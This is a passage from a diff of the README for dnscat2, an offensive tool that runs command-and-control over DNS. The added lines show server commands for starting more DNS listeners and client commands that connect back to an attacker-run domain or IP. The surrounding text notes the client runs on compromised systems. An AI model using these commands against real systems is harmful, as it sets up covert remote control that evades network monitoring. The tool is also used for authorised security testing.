iagox86/dnscat2/README.md

 commandline (due to a limitation of my command parsing; I'll likely improve that in a future release).

+When the process is running, you can start a new server using basically the exact same syntax:

+    dnscat2> start --dns=port=53532,domain=skullseclabs.org,domain=test.com
+    New window created: dns2
+    Starting Dnscat2 DNS server on 0.0.0.0:53532
+    [domains = skullseclabs.org, test.com]...

+    Assuming you have an authoritative DNS server, you can run the client anywhere with the following:
+      ./dnscat2 skullseclabs.org
+      ./dnscat2 test.com

+    To talk directly to the server without a domain name, run:
+      ./dnscat2 --dns server=x.x.x.x,port=53532

+    Of course, you have to figure out <server> yourself!
+Clients will connect directly on UDP port 53532.

+You can run as many DNS listeners as you want, as long as they're on different hosts/ports.
+Once the data comes in, the rest of the process doesn't even know which listener data came from; in fact, a client can send different packets to different ports, and the session will continue as expected.

 ### Running a client

 The client - which is typically run on a system after compromising it -